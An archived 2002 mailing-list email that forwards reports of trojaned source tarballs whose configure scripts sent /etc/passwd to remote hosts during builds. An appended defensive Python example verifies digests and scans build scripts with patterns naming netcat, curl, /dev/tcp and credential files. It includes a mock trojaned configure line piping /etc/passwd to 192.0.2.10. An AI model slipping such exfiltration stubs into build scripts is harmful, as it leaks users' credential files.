From mboxrd@z Thu Jan 1 00:00:00 1970
Received: from lrxms.net ([66.92.147.165] helo=zoose.lrxms.net) by speech.braille.uwo.ca with esmtp (Exim 3.35 #1 (Debian)) id 18C7XY-0004kM-00 for ; Wed, 13 Nov 2002 19:07:24 -0500
Received: from apollo.lrxms.net (apollo.lan [192.168.1.10]) by zoose.lrxms.net (Postfix) with ESMTP id A65E1A8 for ; Thu, 14 Nov 2002 00:07:20 +0000 (UCT)
Received: by apollo.lrxms.net (Postfix, from userid 1000) id 1921237B79; Thu, 14 Nov 2002 00:07:20 +0000 (UCT)
Date: Thu, 14 Nov 2002 00:07:20 +0000
To: speakup@braille.uwo.ca
Subject: [pehrens@ligo.caltech.edu: Re: Nmap *NOT* affected by libpcap trojan]
Message-ID: <20021114000720.GC6936@lrxms.net>
Mail-Followup-To: speakup@braille.uwo.ca
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
From: showell@lrxms.net (Scott Howell)
Sender: speakup-admin@braille.uwo.ca
Errors-To: speakup-admin@braille.uwo.ca
X-BeenThere: speakup@braille.uwo.ca
X-Mailman-Version: 2.0.11
Precedence: bulk
Reply-To: speakup@braille.uwo.ca
List-Id: Speakup is a screen review system for Linux.

Folks,

I am subscribed to the list about Nmap. This info might be very interesting to folks. I have not had a chance to verify all the info nor have I seen anything from Bugtraq, but that could be more a problem with not getting mail from my ISP. In any case, if anyone does know more, please share.

tnx

----- Forwarded message from Philip Ehrens -----

Mailing-List: contact nmap-hackers-help@insecure.org; run by ezmlm
From: Philip Ehrens
To: Fyodor
Cc: nmap-hackers@insecure.org
Subject: Re: Nmap *NOT* affected by libpcap trojan
Mail-Followup-To: Philip Ehrens , Fyodor , nmap-hackers@insecure.org

I would like to point out that the type of trojan described below is becoming increasingly common. ftp.sendmail.org was compromised recently and a similar trojan was placed in the sendmail source tarball.
I know of at least 12 common packages that have had their source tarballs compromised within the last 3 months on servers that were considered secure. The folks doing this have gone as far as to hijack DNS and root machines on specific subnets in order to place this type of trojan.

These trojans are activated during the build process of the source tarball in most cases; usually the configure script contains some variation of code that establishes a connection to a remote machine. I believe that the folks doing this are actually trying to catch certain specific machines or subnets, and are not doing this to set up DDoS or just to own large numbers of boxes. When I activated one of these trojans while building a package all that happened was that my /etc/passwd file was shipped off. The machine listening on the other end never did anything except stay connected for a while.

I expect to see more and more of this at an accelerating rate from now on... if you are letting root make remote connections you are asking for trouble!

Sorry for using your list for this Fyodor, I won't do it again.

Phil

Fyodor wrote:
> I just wanted to send out a quick note that the version of libpcap
> shipped with Nmap does NOT contain the trojan described at:
>
> http://hlug.fscker.com/
> http://slashdot.org/article.pl?sid=02/11/13/1255243&mode=nested&tid=172&threshold=3
>
> Cheers,
> -F

--------------------------------------------------
For help using this (nmap-hackers) mailing list, send a blank email to
nmap-hackers-help@insecure.org . List run by ezmlm-idx (www.ezmlm.org).

----- End forwarded message -----
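The message above describes a trojan that lives in the configure script and phones home (shipping /etc/passwd) the moment the tarball is built. The two checks below are an added example, not code from the mail, from Nmap or from any of the projects named: first compare the tarball's SHA-256 against a digest obtained somewhere other than the download server (a hash file sitting on the same compromised mirror proves nothing), then, before running anything, scan the build scripts inside the archive for code that would open a network connection or read local credential files. The indicator patterns, the script names and the two sample tarballs are constructed for this example; the scan is a heuristic, not a substitute for a signature check.

```python
"""Pre-build checks for a downloaded source tarball (added example).

1. Reject the tarball unless its SHA-256 matches a digest obtained
   out-of-band, so an archive swapped on the mirror is never unpacked.
2. Scan the build scripts inside it for code that phones home or reads
   credential files.  Nothing from the tarball is executed."""
import hashlib
import hmac
import io
import re
import tarfile

# Scripts that "./configure && make" will run; none of them should connect anywhere.
BUILD_SCRIPTS = {"configure", "configure.in", "configure.ac",
                 "Makefile.in", "Makefile.am", "install-sh"}

# Heuristic indicators (assumed for this example): configure probes the compiler
# and libraries, it has no reason to contain any of these.
SUSPICIOUS = [
    (re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"), "hard-coded IPv4 address"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp network redirection"),
    (re.compile(r"\b(?:nc|ncat|netcat|telnet)\b"), "network client invoked"),
    (re.compile(r"\b(?:curl|wget)\b"), "downloader invoked"),
    (re.compile(r"/etc/(?:passwd|shadow)"), "reads local credential file"),
    (re.compile(r"\bconnect\s*\("), "socket connect() in embedded C"),
]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_digest(tarball: bytes, expected_hex: str) -> bool:
    """True only if the tarball matches the digest from the release mail /
    signed announcement, not a .sha256 file fetched from the same server."""
    return hmac.compare_digest(sha256_hex(tarball), expected_hex.strip().lower())


def scan_build_scripts(tarball: bytes) -> list:
    """Return (member name, line number, reason) for each suspicious line
    in any build script inside the archive.  Read-only, nothing is run."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:*") as tf:
        for member in tf.getmembers():
            if not member.isfile() or member.name.rsplit("/", 1)[-1] not in BUILD_SCRIPTS:
                continue
            text = tf.extractfile(member).read().decode("utf-8", "replace")
            for lineno, line in enumerate(text.splitlines(), 1):
                for pattern, reason in SUSPICIOUS:
                    if pattern.search(line):
                        findings.append((member.name, lineno, reason))
    return findings


def check_tarball(tarball: bytes, expected_hex: str) -> tuple:
    """Run both checks; returns (ok, reasons).  Fails closed: a digest
    mismatch is reported without even opening the archive."""
    if not verify_digest(tarball, expected_hex):
        return False, ["sha256 does not match the out-of-band digest"]
    findings = scan_build_scripts(tarball)
    return not findings, [f"{m}:{n}: {why}" for m, n, why in findings]


def make_tarball(files: dict) -> bytes:
    """Build a .tar.gz in memory from {path: text}; used only to construct samples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed samples: a minimal benign configure, and the same script with a
# stub that compiles and runs a client shipping the password file to a remote host.
CLEAN_CONFIGURE = """#!/bin/sh
# Guess values for system-dependent variables and create Makefiles.
prefix=/usr/local
for ac_option in "$@"; do
  case "$ac_option" in
    --prefix=*) prefix=`echo "$ac_option" | sed 's/--prefix=//'` ;;
  esac
done
echo "creating Makefile"
"""
TROJANED_CONFIGURE = CLEAN_CONFIGURE + """
cat > conftest.c <<'EOF'
#include <sys/socket.h>
int main(void) { int s = socket(AF_INET, SOCK_STREAM, 0); connect(s, 0, 0); return 0; }
EOF
$CC -o conftest conftest.c && ./conftest 192.0.2.10 < /etc/passwd
"""
CLEAN_TARBALL = make_tarball({"pkg-1.0/configure": CLEAN_CONFIGURE,
                              "pkg-1.0/Makefile.in": "all:\n\t$(CC) -o pkg pkg.c\n"})
TROJANED_TARBALL = make_tarball({"pkg-1.0/configure": TROJANED_CONFIGURE})

if __name__ == "__main__":
    good = sha256_hex(CLEAN_TARBALL)  # stands in for the digest from the release mail
    print(check_tarball(CLEAN_TARBALL, good))
    print(check_tarball(TROJANED_TARBALL, good))  # swapped on the mirror: digest fails
    print(check_tarball(TROJANED_TARBALL, sha256_hex(TROJANED_TARBALL)))  # scan catches it
```

The digest check only helps if the expected value did not come from the same machine as the tarball; where the project signs releases, verifying the signature replaces it. The scan is the second line of defence for the case Phil describes, where the archive and its published checksum were both replaced. The remaining half of his advice is procedural: run configure and make as an unprivileged user, ideally with no network, so a stub that does slip through has nothing worth sending and nowhere to send it.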